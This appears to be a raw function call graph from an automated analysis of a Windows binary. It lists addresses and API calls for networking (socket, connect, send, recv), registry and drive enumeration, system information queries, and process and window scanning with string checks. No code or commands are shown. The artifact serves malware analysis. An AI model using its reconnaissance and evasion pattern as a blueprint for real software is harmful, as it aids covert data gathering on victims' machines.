5178d7 85073->85071 85075 517607 socket 85074->85075 85076 5175ef 85074->85076 85077 51762b 85075->85077 85078 51763f 85075->85078 85076->85075 85079 517601 85076->85079 85080 517643 85076->85080 85118 5172a0 47 API calls 85077->85118 85078->84950 85079->85075 85119 5172a0 47 API calls 85080->85119 85082 51763a 85082->85078 85084 517654 __acrt_iob_func 85120 51cb20 75 API calls 85084->85120 85086 517674 fflush _errno 85086->84950 85088 54efa8 85087->85088 85092 54ef47 85087->85092 85090 54efc0 85088->85090 85121 51c960 46 API calls 85088->85121 85090->84956 85091 54ef66 _errno 85091->84956 85092->85091 85093 54ef96 htons 85092->85093 85093->85090 85094->84994 85095->84964 85096->84952 85097->84951 85098->84954 85099->84963 85100->84993 85101->84999 85102->84988 85103->84983 85104->84985 85105->85037 85106->85017 85107->85039 85108->85021 85109->85037 85110->84952 85111->85013 85112->85038 85113->85012 85114->85014 85115->85019 85116->85035 85117->85044 85118->85082 85119->85084 85120->85086 85121->85090 85122->85056 85123->85056 85124->85060 85125->85073 85126 549290 85141 5176a0 85126->85141 85129 5493c3 WSAGetLastError 85130 5493e5 85129->85130 85137 549392 85129->85137 85155 52d090 63 API calls 85130->85155 85132 5492f3 85136 549335 WSAIoctl 85132->85136 85132->85137 85133 5493f7 85156 554f40 49 API calls 85133->85156 85136->85137 85139 549366 85136->85139 85138 5493be 85137->85138 85157 5550a0 48 API calls 85137->85157 85139->85137 85140 549371 setsockopt 85139->85140 85140->85137 85142 5176c0 85141->85142 85143 5176e6 send 85141->85143 85142->85143 85144 5176c9 85142->85144 85145 5176f4 85143->85145 85146 51775e 85143->85146 85147 5176d3 send 85144->85147 85148 51770b 85144->85148 85158 5172a0 47 API calls 85145->85158 85146->85129 85146->85132 85147->85145 85159 5172a0 47 API calls 85148->85159 85151 517704 85151->85146 85152 51771c __acrt_iob_func 85160 51cb20 75 API calls 85152->85160 85154 51773c fflush _errno 85154->85146 85155->85133 85156->85137 85157->85138 85158->85151 85159->85152 85160->85154 85161 512f17 85178 9baf30 85161->85178 85165 5131d3 85168 51315c RegEnumKeyExA 85177 512f49 85168->85177 85169 511619 29 API calls 85170 513046 RegOpenKeyExA 85169->85170 85171 513089 RegQueryValueExA 85170->85171 85170->85177 85172 51313b RegCloseKey 85171->85172 85171->85177 85172->85177 85175 9bb320 free _strdup free free free 85175->85177 85177->85165 85177->85168 85177->85169 85177->85172 85177->85175 85187 511619 85177->85187 85190 9bb200 malloc 85177->85190 85197 9bb290 strlen 85177->85197 85198 9bb130 malloc 85177->85198 85200 9baf50 malloc 85178->85200 85181 9bb320 85182 9bb33c 85181->85182 85183 9bb35b 85182->85183 85184 9bb388 _strdup 85182->85184 85185 9bb371 85182->85185 85183->85185 85208 9bb9b0 85183->85208 85184->85185 85185->85177 85221 8a1360 85187->85221 85189 511645 RegOpenKeyExA 85189->85177 85191 9bb25e 85190->85191 85192 9bb214 85190->85192 85191->85177 85241 9bf730 85192->85241 85195 9c0610 free 85196 9bb274 free _errno 85195->85196 85196->85191 85199 9bb14e 85198->85199 85199->85177 85201 9baf64 85200->85201 85202 512f2c 85200->85202 85207 9b8c10 malloc malloc free 85201->85207 85202->85181 85204 9bafa5 85205 9bafa9 85204->85205 85206 9bafb8 free 85204->85206 85205->85202 85206->85202 85207->85204 85209 9bb9bd 85208->85209 85210 9bba20 85209->85210 85211 9bb9d0 85209->85211 85220 9b8a50 free 85210->85220 85213 9bb9d5 85211->85213 85214 9bba0f free 85211->85214 85217 9c0610 85213->85217 85214->85213 85218 9c061c free 85217->85218 85219 9bb9f0 free 85217->85219 85218->85219 85219->85185 85222 8a1379 85221->85222 85223 8a13b0 85221->85223 85228 89d1d0 _errno 85222->85228 85225 89d1d0 29 API calls 85223->85225 85227 8a13d0 85225->85227 85226 8a1398 85226->85189 85227->85189 85236 89d3ae 85228->85236 85238 89d287 85228->85238 85229 89d340 fputc 85229->85238 85230 89b640 fputc 85230->85238 85231 89d504 localeconv 85239 8a78b0 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 85231->85239 85233 89ca50 26 API calls 85233->85238 85234 89c9c0 25 API calls 85234->85238 85236->85226 85237 89cc90 10 API calls 85237->85238 85238->85229 85238->85230 85238->85231 85238->85233 85238->85234 85238->85236 85238->85237 85240 89b6a0 fputc fputc WideCharToMultiByte _errno 85238->85240 85239->85238 85240->85238 85244 9bfc00 calloc 85241->85244 85245 9bfc25 calloc 85244->85245 85246 9bb255 85244->85246 85245->85246 85247 9bfc9c free 85245->85247 85246->85191 85246->85195 85247->85246 85248 5131d7 CreateToolhelp32Snapshot 85249 513223 85248->85249 85254 513200 85248->85254 85250 9baf30 5 API calls 85249->85250 85251 513232 Process32First 85250->85251 85252 513255 85251->85252 85253 5132dc CloseHandle 85251->85253 85256 9bb200 7 API calls 85252->85256 85258 9bb320 free _strdup free free free 85252->85258 85259 9bb130 malloc 85252->85259 85260 5132bc Process32Next 85252->85260 85261 9bb290 strlen 85252->85261 85255 9bb320 5 API calls 85253->85255 85255->85254 85256->85252 85258->85252 85259->85252 85260->85252 85260->85253 85262 89b180 Sleep 85263 51255d 85264 899f70 85263->85264 85265 51256c GetSystemInfo 85264->85265 85266 9bb130 malloc 85265->85266 85267 512589 85266->85267 85268 9bb320 5 API calls 85267->85268 85269 5125a0 GlobalMemoryStatusEx 85268->85269 85270 9bb130 malloc 85269->85270 85271 5125ec 85270->85271 85272 9bb320 5 API calls 85271->85272 85273 512603 GetLogicalDriveStringsA 85272->85273 85274 512626 85273->85274 85275 51277c 85273->85275 85276 9baf30 5 API calls 85274->85276 85278 9bb130 malloc 85275->85278 85277 51262b 85276->85277 85279 512762 85277->85279 85280 51263c GetDriveTypeA 85277->85280 85281 5127bf 85278->85281 85282 9bb320 5 API calls 85279->85282 85284 512743 strlen 85280->85284 85285 512655 GetDiskFreeSpaceExA 85280->85285 85283 9bb320 5 API calls 85281->85283 85282->85275 85286 5127d6 KiUserCallbackDispatcher 85283->85286 85284->85277 85285->85284 85305 51268b 85285->85305 85288 5127f8 85286->85288 85287 9bb200 7 API calls 85287->85305 85290 9bb130 malloc 85288->85290 85291 512809 85290->85291 85293 9bb320 5 API calls 85291->85293 85292 9bb320 free _strdup free free free 85292->85305 85294 512820 85293->85294 85295 9bb130 malloc 85294->85295 85296 51282b 85295->85296 85297 9bb320 5 API calls 85296->85297 85298 512842 SHGetKnownFolderPath wcscpy wcscat FindFirstFileW 85297->85298 85299 512906 FindNextFileW 85298->85299 85300 512928 85298->85300 85299->85299 85299->85300 85302 9bb130 malloc 85300->85302 85301 9bb020 malloc 85301->85305 85303 51293d 85302->85303 85304 9bb320 5 API calls 85303->85304 85306 512954 K32EnumProcesses 85304->85306 85305->85284 85305->85287 85305->85292 85305->85301 85316 9bb290 strlen 85305->85316 85307 51297b 85306->85307 85310 5129a9 85306->85310 85308 9bb130 malloc 85307->85308 85309 512992 85308->85309 85311 9bb320 5 API calls 85309->85311 85312 9bb130 malloc 85310->85312 85311->85310 85313 5129e0 85312->85313 85314 9bb320 5 API calls 85313->85314 85315 5129f7 85314->85315 85317 5c8b50 85318 5c8b60 85317->85318 85320 5c8b88 85318->85320 85339 5d8e70 85318->85339 85344 5d88b0 QueryPerformanceFrequency QueryPerformanceCounter 85320->85344 85322 5c8b9a 85324 5c8c32 85322->85324 85346 5d4530 85322->85346 85325 5c8c2b 85325->85324 85326 5c8cb5 85325->85326 85379 5c8db0 10 API calls 85325->85379 85353 5ce7c0 85326->85353 85330 5c8d83 85330->85326 85332 5c8d8d 85330->85332 85380 5c6e90 memset memset 85332->85380 85334 5c8d1a 85361 5c6050 85334->85361 85335 5c8d40 85378 5c6e90 memset memset 85335->85378 85340 5d8ea7 85339->85340 85341 5d8e80 85339->85341 85340->85318 85381 5d8d60 9 API calls 85341->85381 85343 5d8e95 85343->85340 85345 5d88f2 85344->85345 85345->85322 85347 5d455e 85346->85347 85348 5d4579 85346->85348 85382 5d4c20 memmove 85347->85382 85348->85325 85350 5d4572 85350->85348 85383 5d17d0 memset memmove memcpy 85350->85383 85352 5d458e 85352->85325 85354 5ce7db 85353->85354 85356 5c8cf2 85353->85356 85384 5c4fe0 85354->85384 85356->85335 85357 5ce600 85356->85357 85358 5ce60d 85357->85358 85359 5c8d13 85357->85359 85358->85359 85388 5dcd70 memset 85358->85388 85359->85334 85359->85335 85362 5c60d9 85361->85362 85389 5daa30 85362->85389 85366 5c64a4 85428 5cf400 memset memset 85366->85428 85368 5c64c7 85369 5c6506 85368->85369 85370 5c68df 85368->85370 85429 5dc320 QueryPerformanceFrequency QueryPerformanceCounter 85369->85429 85373 5c6050 25 API calls 85370->85373 85372 5c6515 85430 5cf400 memset memset 85372->85430 85374 5c68d2 85373->85374 85374->85324 85376 5c652f 85431 5d8880 WakeAllConditionVariable 85376->85431 85379->85330 85381->85343 85382->85350 85383->85352 85385 5c4fec 85384->85385 85386 5c5003 85385->85386 85387 5c4ff3 memset 85385->85387 85386->85356 85387->85386 85388->85359 85390 5daa5f 85389->85390 85402 5c62fc 85390->85402 85432 5ce730 85390->85432 85393 5daabf 85396 5daacd htons 85393->85396 85406 5dab0e 85393->85406 85394 5dab18 htons 85395 5dab58 85394->85395 85397 5dab96 socket 85395->85397 85398 5dab75 85395->85398 85396->85395 85397->85398 85397->85406 85399 5dabd0 ioctlsocket 85398->85399 85398->85406 85417 5dad2e 85398->85417 85400 5dabef setsockopt 85399->85400 85401 5dac10 85399->85401 85400->85401 85400->85406 85403 5dac37 85401->85403 85404 5dac16 setsockopt 85401->85404 85427 5c6d50 7 API calls 85402->85427 85407 5dac7a 85403->85407 85408 5dad04 85403->85408 85411 5dac57 htonl 85403->85411 85404->85403 85404->85406 85405 5dae6e closesocket 85405->85402 85406->85402 85406->85405 85409 5dace7 setsockopt 85407->85409 85412 5dac9d 85407->85412 85413 5dad0a setsockopt 85408->85413 85408->85417 85409->85408 85410 5dada0 connect 85415 5dadb3 WSAGetLastError 85410->85415 85414 5dacc6 bind 85411->85414 85412->85414 85413->85406 85413->85417 85414->85406 85416 5dacdd 85414->85416 85415->85406 85415->85417 85416->85408 85416->85409 85417->85406 85417->85410 85417->85415 85418 5dade1 85417->85418 85418->85406 85435 5daf70 85418->85435 85421 5daeaf 85438 5ce760 memset 85421->85438 85422 5dae9f 85423 5ce7c0 memset 85422->85423 85425 5daea6 85423->85425 85425->85406 85439 5ce180 memset 85425->85439 85427->85366 85428->85368 85429->85372 85430->85376 85431->85374 85433 5c4fe0 memset 85432->85433 85434 5ce737 85433->85434 85434->85393 85434->85394 85434->85406 85436 5daf93 getsockname 85435->85436 85437 5dae21 85435->85437 85436->85437 85437->85406 85437->85421 85437->85422 85438->85425 85439->85406 85440 513d5e 85443 513d30 85440->85443 85442 513d90 85443->85440 85443->85442 85444 520ab0 85443->85444 85447 5205b0 85444->85447 85448 5205bd 85447->85448 85452 5207c7 85447->85452 85449 52066a 85448->85449 85448->85452 85459 5207ce 85448->85459 85494 5203c0 49 API calls 85448->85494 85495 527450 80 API calls 85448->85495 85458 5206f0 85449->85458 85449->85459 85496 5273b0 80 API calls 85449->85496 85452->85443 85455 52075f getsockopt 85455->85458 85456 5207ef 85460 520861 WSAWaitForMultipleEvents 85456->85460 85463 520a2f 85456->85463 85475 526fa0 85456->85475 85457 520707 WSAEventSelect 85457->85458 85457->85459 85458->85455 85458->85456 85458->85457 85462 5176a0 81 API calls 85458->85462 85497 527380 47 API calls 85459->85497 85468 520854 85460->85468 85462->85458 85463->85459 85467 520a87 85463->85467 85465 520a19 WSAResetEvent 85465->85463 85466 5208c8 WSAEnumNetworkEvents 85466->85468 85498 526df0 Sleep WSASetLastError 85467->85498 85468->85466 85469 520928 WSAEventSelect 85468->85469 85474 520970 85468->85474 85469->85468 85471 520a94 85471->85459 85472 5209e8 WSAEnumNetworkEvents 85473 5209d0 WSAEventSelect 85472->85473 85472->85474 85473->85472 85473->85474 85474->85465 85474->85472 85474->85473 85476 526fd4 85475->85476 85477 526feb 85475->85477 85476->85477 85489 52701b 85476->85489 85478 520847 85477->85478 85479 527186 WSASetLastError 85477->85479 85480 526fff Sleep 85477->85480 85478->85459 85478->85460 85478->85468 85479->85478 85480->85478 85481 527176 85484 527207 select 85481->85484 85482 5271aa 85483 52730b 85482->85483 85486 527331 WSASetLastError 85482->85486 85487 5271cc Sleep 85482->85487 85483->85478 85485 527312 WSAGetLastError 85483->85485 85484->85483 85493 527233 85484->85493 85485->85478 85486->85478 85486->85483 85487->85478 85488 5271ec 85487->85488 85488->85485 85489->85481 85489->85482 85490 52726b __WSAFDIsSet 85491 52729a __WSAFDIsSet 85490->85491 85490->85493 85492 5272ba __WSAFDIsSet 85491->85492 85491->85493 85492->85493 85493->85478 85493->85490 85493->85491 85493->85492 85494->85448 85495->85448 85496->85449 85497->85452 85498->85471 85499 54e400 85500 54e412 85499->85500 85504 54e459 85499->85504 85501 54e422 85500->85501 85523 563030 47 API calls 85500->85523 85524 5709d0 47 API calls 85501->85524 85506 54e4a8 85504->85506 85508 54e495 85504->85508 85511 54b5a0 85504->85511 85505 54e42b 85525 5468b0 55 API calls 85505->85525 85508->85506 85510 54b5a0 49 API calls 85508->85510 85510->85506 85512 54b5d2 85511->85512 85513 54b5c0 85511->85513 85512->85508 85513->85512 85514 54b713 85513->85514 85517 54b626 85513->85517 85527 554f40 49 API calls 85514->85527 85516 54b65a 85516->85512 85518 54b737 85516->85518 85520 54b72b 85516->85520 85517->85512 85517->85516 85517->85518 85517->85520 85526 5550a0 48 API calls 85517->85526 85518->85512 85529 5550a0 48 API calls 85518->85529 85520->85512 85528 5550a0 48 API calls 85520->85528 85523->85501 85524->85505 85525->85504 85526->85517 85527->85512 85528->85512 85529->85512 85530 549480 85541 517770 85530->85541 85533 5494df WSAGetLastError 85534 5494fb 85533->85534 85538 5494c9 85533->85538 85555 52d090 63 API calls 85534->85555 85536 54950f 85556 554f40 49 API calls 85536->85556 85539 5494da 85538->85539 85557 5550a0 48 API calls 85538->85557 85542 517790 85541->85542 85543 5177b6 recv 85541->85543 85542->85543 85544 517799 85542->85544 85545 5177c4 85543->85545 85546 51782e 85543->85546 85548 5177a3 recv 85544->85548 85549 5177db 85544->85549 85558 5172a0 47 API calls 85545->85558 85546->85533 85546->85538 85548->85545 85559 5172a0 47 API calls 85549->85559 85550 5177d4 85550->85546 85552 5177ec __acrt_iob_func 85560 51cb20 75 API calls 85552->85560 85554 51780c fflush _errno 85554->85546 85555->85536 85556->85538 85557->85539 85558->85550 85559->85552 85560->85554 85561 5113c9 85562 5113d0 85561->85562 85563 5113e3 85562->85563 85564 5111da 85562->85564 85611 898a20 128 API calls 85563->85611 85565 511460 _initterm 85564->85565 85566 5111e7 85564->85566 85569 511483 exit 85565->85569 85568 5113fd _initterm 85566->85568 85572 5111ff 85566->85572 85568->85572 85588 8993e0 85572->85588 85573 511231 SetUnhandledExceptionFilter _set_invalid_parameter_handler 85602 899210 85573->85602 85575 511257 __p__acmdln 85578 51126e malloc 85575->85578 85577 511300 85579 511318 strlen malloc memcpy 85577->85579 85578->85569 85578->85577 85579->85579 85580 51134e 85579->85580 85603 899060 85580->85603 85582 511367 85608 9c0a80 85582->85608 85595 899400 85588->85595 85601 8993f3 85588->85601 85589 899688 85590 899699 85589->85590 85589->85601 85592 8996c7 85590->85592 85612 899280 13 API calls 85590->85612 85613 899220 13 API calls 85592->85613 85594 8996df 85594->85573 85595->85589 85595->85592 85596 8994e2 85595->85596 85600 8995b8 85595->85600 85595->85601 85596->85595 85597 899220 13 API calls 85596->85597 85598 899280 13 API calls 85596->85598 85597->85596 85598->85596 85599 8995ea VirtualProtect 85599->85600 85600->85599 85600->85601 85601->85573 85602->85575 85604 899069 85603->85604 85605 899000 85603->85605 85604->85582 85605->85605 85614 5114c0 _crt_atexit 85605->85614 85607 899030 85607->85582 85609 899060 _crt_atexit 85608->85609 85610 9c0abb 85609->85610 85611->85566 85612->85590 85613->85594 85614->85607 85615 6947b0 85641 6ee5d0 strlen MultiByteToWideChar 85615->85641 85618 6947df 85654 68d520 17 API calls 85618->85654 85619 694824 85655 6c7120 16 API calls 85619->85655 85622 694829 85656 6c7220 16 API calls 85622->85656 85623 6947ed 85625 6947f8 85623->85625 85626 69488d fclose 85623->85626 85626->85625 85627 69483a GetLastError 85657 6c7310 16 API calls 85627->85657 85629 694852 _errno 85630 69486b 85629->85630 85631 694860 _errno 85629->85631 85658 6c7120 16 API calls 85630->85658 85631->85630 85632 694898 85631->85632 85660 6c7120 16 API calls 85632->85660 85634 694870 85659 6c7220 16 API calls 85634->85659 85637 69489d 85661 6c7220 16 API calls 85637->85661 85639 694881 85662 6c7310 16 API calls 85639->85662 85642 6ee6b0 GetLastError 85641->85642 85645 6ee608 85641->85645 85643 6ee6bd MultiByteToWideChar 85642->85643 85644 6ee6e2 GetLastError 85642->85644 85643->85644 85643->85645 85646 6ee6f4 fopen 85644->85646 85647 6947c4 strchr 85644->85647 85648 6ee622 MultiByteToWideChar 85645->85648 85646->85647 85647->85618 85647->85619 85648->85647 85649 6ee649 strlen MultiByteToWideChar 85648->85649 85649->85647 85650 6ee673 _wfopen 85649->85650 85650->85647 85651 6ee685 _errno 85650->85651 85652 6ee6a0 fopen 85651->85652 85653 6ee690 _errno 85651->85653 85652->85647 85653->85647 85653->85652 85654->85623 85655->85622 85656->85627 85657->85629 85658->85634 85659->85639 85660->85637 85661->85639 85662->85625 85663 5d9740 85664 5d9780 85663->85664 85669 5d975d 85663->85669 85665 5d9788 getenv 85664->85665 85666 5d9914 memset RegOpenKeyExA 85664->85666 85668 5d979b 85665->85668 85667 5d995a RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen 85666->85667 85695 5d9812 85666->85695 85667->85668 85670 5d97a6 _stat64 85668->85670 85668->85695 85669->85665 85669->85670 85669->85695 85671 5d97c7 85670->85671 85675 5d980b 85670->85675 85672 5d97f6 _stricmp 85671->85672 85673 5d97e2 _time64 85671->85673 85672->85675 85673->85672 85675->85695 85696 5d77b0 85675->85696 85677 5c4fe0 memset 85678 5d9896 85677->85678 85679 5d98a1 _time64 85678->85679 85678->85695 85680 5d98bb 85679->85680 85680->85695 85707 5ce2d0 memset _time64 85680->85707 85682 5d98d3 85682->85695 85708 5ce2d0 memset _time64 85682->85708 85684 5cd120 14 API calls 85694 5d98e8 85684->85694 85686 5c4fe0 memset 85686->85694 85688 5ce730 memset 85688->85694 85689 5d6d60 memcmp 85689->85694 85690 5d6320 memcpy 85690->85694 85691 5ce3c0 memset 85691->85694 85692 5d9c3d _stricmp 85692->85694 85693 5ce7c0 memset 85693->85694 85694->85684 85694->85686 85694->85688 85694->85689 85694->85690 85694->85691 85694->85692 85694->85693 85694->85695 85709 5cd190 85694->85709 85713 5ce760 memset 85694->85713 85697 5d7827 85696->85697 85698 5d77d7 fopen 85696->85698 85697->85677 85697->85695 85699 5d780e GetLastError 85698->85699 85700 5d77e9 fseek 85698->85700 85699->85697 85701 5d782f ftell 85700->85701 85702 5d7801 fclose 85700->85702 85701->85702 85703 5d783c fseek 85701->85703 85702->85697 85703->85702 85704 5d784f 85703->85704 85705 5d7866 fread 85704->85705 85706 5d787a 85704->85706 85705->85702 85705->85706 85706->85702 85707->85682 85708->85694 85712 5cd1ae 85709->85712 85710 5cd860 SetLastError 85711 5cd1f3 85710->85711 85711->85694 85712->85710 85712->85711 85713->85694 85714 6ec9b0 85717 6ec9e5 85714->85717 85718 6ec9cb 85714->85718 85715 6eca36 85716 6ec9f9 malloc 85716->85718 85719 6ec9e1 85716->85719 85717->85715 85717->85716 85718->85719 85726 6c7120 16 API calls 85718->85726 85721 6eca13 85727 6c7220 16 API calls 85721->85727 85723 6eca1c 85728 6c7310 16 API calls 85723->85728 85725 6eca2d 85726->85721 85727->85723 85728->85725 85729 513ab0 AcquireSRWLockExclusive 85730 513ac3 85729->85730 85731 513acb ReleaseSRWLockExclusive 85729->85731 85730->85731 85732 513ad6 85730->85732 85736 52d7b0 85732->85736 85734 513aeb 85735 513af3 ReleaseSRWLockExclusive 85734->85735 85737 52d7d9 85736->85737 85738 52d7be FreeLibrary 85736->85738 85739 52d7e0 WSACleanup 85737->85739 85740 52d7de 85737->85740 85738->85737 85740->85734 85741 521139 85742 521148 85741->85742 85743 521512 85742->85743 85748 521161 85742->85748 85744 520f69 85743->85744 85763 5222d0 49 API calls 85743->85763 85745 521fb0 85744->85745 85746 521f58 85744->85746 85755 520f00 85744->85755 85745->85755 85766 524940 79 API calls 85745->85766 85764 520150 48 API calls 85746->85764 85748->85744 85762 520150 48 API calls 85748->85762 85749 521f61 85754 521fa6 85749->85754 85765 54d4d0 48 API calls 85749->85765 85751 520f21 85754->85751 85754->85755 85767 5175a0 85754->85767 85755->85751 85761 520150 48 API calls 85755->85761 85760 5175a0 47 API calls 85760->85755 85761->85751 85762->85744 85763->85744 85764->85749 85765->85754 85766->85754 85768 5175d4 85767->85768 85769 5175aa 85767->85769 85768->85760 85769->85768 85770 5175c1 85769->85770 85773 5172a0 47 API calls 85770->85773 85772 5175d1 85772->85768 85773->85772 85774 9b8e70 85775 9b8e9a 85774->85775 85776 9b8ea6 85775->85776 85792 898f70 85775->85792 85781 9b8ee6 85782 898f70 8 API calls 85783 9b8eef GetVersion CryptAcquireContextA 85782->85783 85784 9b8f90 GetLastError __acrt_iob_func 85783->85784 85785 9b8f46 CryptGenRandom CryptReleaseContext 85783->85785 85803 89b500 39 API calls 85784->85803 85786 9b8fd0 GetLastError __acrt_iob_func 85785->85786 85787 9b8f84 85785->85787 85804 89b500 39 API calls 85786->85804 85789 9b8fb9 _time32 85791 9b8ff9 85791->85789 85805 898e90 _open 85792->85805 85794 898f82 85795 898e90 8 API calls 85794->85795 85796 898fa2 85795->85796 85797 898f70 8 API calls 85796->85797 85798 898fb8 85797->85798 85799 8a12c0 85798->85799 85800 8a12cc 85799->85800 85818 89e050 85800->85818 85802 8a12fa 85802->85781 85802->85782 85803->85789 85804->85791 85807 898eba 85805->85807 85806 898ef3 _exit 85806->85807 85807->85806 85808 9c29f0 85807->85808 85809 898f39 _write 85807->85809 85810 898f53 _close 85807->85810 85811 9c2a09 85808->85811 85812 9c2a0a CryptAcquireContextA 85808->85812 85809->85807 85809->85810 85810->85807 85811->85794 85813 9c2a59 CryptGenRandom 85812->85813 85814 9c2a41 85812->85814 85815 9c2a7d 85813->85815 85816 9c2a86 CryptReleaseContext 85813->85816 85814->85794 85815->85816 85817 9c2a9d CryptReleaseContext 85815->85817 85816->85814 85817->85814 85819 89e09d localeconv localeconv 85818->85819 85820 89f886 _errno 85818->85820 85852 89e0ce 85819->85852 85909 89e503 85820->85909 85821 89f993 85824 89f9b5 realloc 85821->85824 85910 89e214 85821->85910 85822 89e300 strlen 85822->85852 85823 89e146 isspace 85823->85852 85824->85910 85825 89e28c 85828 89e2d1 85825->85828 85835 89e2c0 free 85825->85835 85826 89f674 85833 89e1e1 85826->85833 85842 89f6b0 free 85826->85842 85826->85910 85827 89e176 isspace 85827->85852 85829 89e2f1 free 85828->85829 85830 89e2e1 free 85828->85830 85829->85910 85830->85829 85831 89f54c 85845 8a0250 ungetc 85831->85845 85846 89f564 85831->85846 85832 89e18e 85838 89ed90 ungetc 85832->85838 85839 89e1a6 85832->85839 85840 89e1f1 free 85833->85840 85841 89e205 free 85833->85841 85834 89e243 85834->85825 85843 89e261 isspace 85834->85843 85835->85828 85835->85835 85836 8a0178 85836->85833 85849 8a0184 free 85836->85849 85837 89f603 85837->85833 85848 89f630 free 85837->85848 85837->85910 85838->85910 85839->85833 85851 89e1d0 free 85839->85851 85840->85841 85841->85910 85842->85833 85842->85842 85843->85834 85894 89e26f 85843->85894 85844 89f5b6 85844->85833 85862 89f5d0 free 85844->85862 85853 8a0274 strtoul 85845->85853 85846->85833 85861 89f5a0 free 85846->85861 85846->85910 85847 89ecc8 _errno _errno 85863 89e4b0 85847->85863 85848->85833 85848->85848 85849->85833 85849->85849 85850 89e388 85850->85844 85850->85850 85850->85863 85851->85833 85851->85851 85852->85822 85852->85823 85852->85826 85852->85827 85852->85831 85852->85832 85852->85834 85852->85850 85858 89e560 isspace 85852->85858 85859 89e582 85852->85859 85852->85909 85853->85909 85853->85910 85854 89fed7 tolower 85854->85909 85854->85910 85855 89eb52 85871 89e81a 85855->85871 85874 89eb63 85855->85874 85856 89ed17 _errno 85856->85837 85856->85863 85857 89feb6 isxdigit 85857->85909 85858->85852 85859->85833 85868 89e5a0 free 85859->85868 85859->85910 85860 8a0742 ungetc 85860->85825 85861->85833 85861->85861 85862->85833 85862->85862 85863->85836 85863->85837 85863->85847 85863->85855 85863->85856 85864 89ed02 isspace 85863->85864 85866 89e527 85863->85866 85873 89e6b9 85863->85873 85878 8a00b8 ungetc 85863->85878 85863->85909 85864->85863 85867 89e626 _errno 85864->85867 85865 8a03d9 tolower 85865->85909 85866->85833 85877 89e538 free 85866->85877 85867->85863 85868->85833 85868->85868 85869 8a11a4 ungetc 85869->85909 85870 89e765 85884 8a08f9 85870->85884 85870->85909 85870->85910 85875 89e86d malloc 85871->85875 85871->85909 85871->85910 85872 8a0438 tolower 85872->85909 85872->85910 85873->85870 85883 89e701 malloc 85873->85883 85873->85909 85873->85910 85879 89ebac malloc 85874->85879 85874->85909 85874->85910 85880 89e897 85875->85880 85875->85910 85876 8a0927 85876->85833 85886 8a0958 free 85876->85886 85876->85910 85877->85833 85877->85877 85878->85863 85885 89ebd2 85879->85885 85879->85910 85887 89e8ab malloc 85880->85887 85893 89e8c7 85880->85893 85881 8a08d7 ungetc 85881->85909 85882 89ea53 malloc 85882->85893 85882->85910 85890 89e71f 85883->85890 85883->85910 85884->85833 85897 8a0911 free 85884->85897 85884->85910 85892 89ebe6 malloc 85885->85892 85885->85893 85886->85833 85886->85886 85887->85893 85888 89e96f realloc 85888->85909 85889 89eb2d isspace 85889->85909 85896 89e733 malloc 85890->85896 85900 89e74f 85890->85900 85891 89e7ac isspace 85891->85909 85892->85893 85895 89ea85 malloc 85893->85895 85893->85909 85894->85825 85894->85860 85895->85893 85896->85900 85897->85833 85897->85897 85898 8a78b0 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 85898->85909 85899 8a0e3e ungetc 85899->85909 85900->85870 85901 89f293 strtoll 85901->85909 85901->85910 85902 89fc5e strtol 85902->85909 85902->85910 85904 8a0d20 _errno 85904->85909 85905 89ec9a realloc 85905->85909 85906 8a0006 ungetc 85906->85909 85907 8a0054 realloc 85907->85909 85908 8a0e5d realloc 85908->85909 85909->85820 85909->85821 85909->85826 85909->85845 85909->85853 85909->85854 85909->85857 85909->85865 85909->85866 85909->85869 85909->85872 85909->85876 85909->85881 85909->85882 85909->85888 85909->85889 85909->85891 85909->85894 85909->85898 85909->85899 85909->85901 85909->85902 85909->85904 85909->85905 85909->85906 85909->85907 85909->85908 85909->85910 85911 89fc10 realloc 85909->85911 85912 89ed2c _errno 85909->85912 85913 89ed5e _errno 85909->85913 85918 89b1a0 7 API calls 85909->85918 85910->85802 85911->85909 85912->85833 85914 89ed43 85912->85914 85913->85833 85916 89ed75 85913->85916 85915 89ed48 free 85914->85915 85915->85833 85915->85915 85917 89ed78 free 85916->85917 85917->85833 85917->85917 85918->85909 85919 9c08b0 85920 8a1360 29 API calls 85919->85920 85921 9c08e2 85920->85921 85922 9c08ee 85921->85922 85923 898f70 8 API calls 85921->85923 85924 9c08f7 85923->85924 85925 8a1360 29 API calls 85924->85925 85926 9c0933 85925->85926 85927 9c0988 85926->85927 85928 9c0938 85926->85928 85936 9c0640 85927->85936 85944 8a1420 30 API calls 85928->85944 85931 9c094c 85933 9c09ad 85931->85933 85934 9c0640 4 API calls 85931->85934 85932 9c099f 85933->85932 85935 9c096b free 85934->85935 85937 9c06a8 _errno 85936->85937 85938 9c0651 85936->85938 85940 9c069d 85937->85940 85938->85937 85939 9c065f 85938->85939 85941 9c0677 memcpy 85939->85941 85945 9c05b0 85939->85945 85940->85932 85941->85940 85944->85931 85946 9c05be 85945->85946 85950 9c05e2 85945->85950 85947 9c05fc _errno 85946->85947 85949 9c05c6 realloc 85946->85949 85947->85950 85949->85950 85950->85940 85950->85941 85951 5129ff FindFirstFileA 85952 512a31 85951->85952 85998 9bb290 strlen 85952->85998 85954 512a45 85955 9bb320 free _strdup free free free 85954->85955 85956 512a5c RegOpenKeyExA 85955->85956 85957 512a93 85956->85957 85958 9bb290 strlen 85957->85958 85959 512aa7 85958->85959 85960 9bb320 free _strdup free free free 85959->85960 85961 512abe CharUpperA strstr 85960->85961 85963 512b0e 85961->85963 85964 9bb290 strlen 85963->85964 85965 512b22 85964->85965 85966 9bb320 free _strdup free free free 85965->85966 85967 512b39 CreateToolhelp32Snapshot Process32First 85966->85967 85968 512b94 85967->85968 85969 512ba5 QueryFullProcessImageNameA 85967->85969 85968->85969 85971 512bb0 Process32Next 85968->85971 85972 512c3b CloseHandle strstr 85969->85972 85971->85968 85971->85969 85973 512c68 85972->85973 85974 9bb290 strlen 85973->85974 85975 512c7c 85974->85975 85976 9bb320 free _strdup free free free 85975->85976 85977 512c93 CreateToolhelp32Snapshot Process32First 85976->85977 85978 512d99 85977->85978 85979 512cef strncpy 85977->85979 85980 9bb290 strlen 85978->85980 85982 512d31 strstr 85979->85982 85981 512dda 85980->85981 85983 9bb320 free _strdup free free free 85981->85983 85982->85978 85984 512d4b strstr 85982->85984 85985 512df1 CloseHandle EnumWindows 85983->85985 85984->85978 85986 512d65 strstr 85984->85986 85987 512e30 85985->85987 85986->85978 85988 512d7f strstr 85986->85988 85990 9bb290 strlen 85987->85990 85988->85978 85989 512daf Process32Next 85988->85989 85989->85978 85989->85979 85991 512e44 